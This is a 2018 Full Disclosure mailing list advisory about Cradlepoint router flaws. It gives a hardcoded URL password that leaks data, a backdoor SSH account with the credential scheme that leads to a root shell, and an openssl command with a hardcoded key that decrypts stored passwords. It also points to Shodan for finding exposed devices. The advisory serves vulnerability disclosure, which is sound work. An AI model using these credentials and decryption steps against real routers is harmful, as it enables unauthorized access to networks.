Full Disclosure mailing list archives

Cradlepoint vulnerabilities


From: CrazyOwl via Fulldisclosure <fulldisclosure () seclists org>
Date: Mon, 05 Nov 2018 18:07:55 +0000

Many vulnerabilities in the built-in software of the Cradlepoint Router. 100000 such routers can be seen in the shodan 
(https://www.shodan.io/search?query=cradlepointhttpservice). These vulnerabilities were reported to Cradlepoint in 
august.

A hardcoded password allows you to retrieve sensitive information, including the default password:
* go to http://[router IP]/plt?password=W6rqCjk5ijRs6Ya5bv55
* router default password is last 8 characters of WLAN_MAC

Escalate privileges using a backdoor account with a hardcode username and password:
1. enable ssh login
2. set control.system.techsupport_access true
3. login with ssh using u:cproot p:1415 + last 4 bytes of WLAN_MAC
4. type 'sh' to get root shell

Passwords that are encrypted using a hardcoded key:
* for passwords in the configuration store starting with "$1" the encrypted password is all after the last "$"
* the password can be decrypted using: echo [encrypted password] | openssl enc -d -aes-256-cbc -md sha1 -base64 -nosalt 
-k "NGJkODg1ZGE1NDhhY2ZhY2VmYjM0MDIzZjA0M2YzNTY="

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Current thread: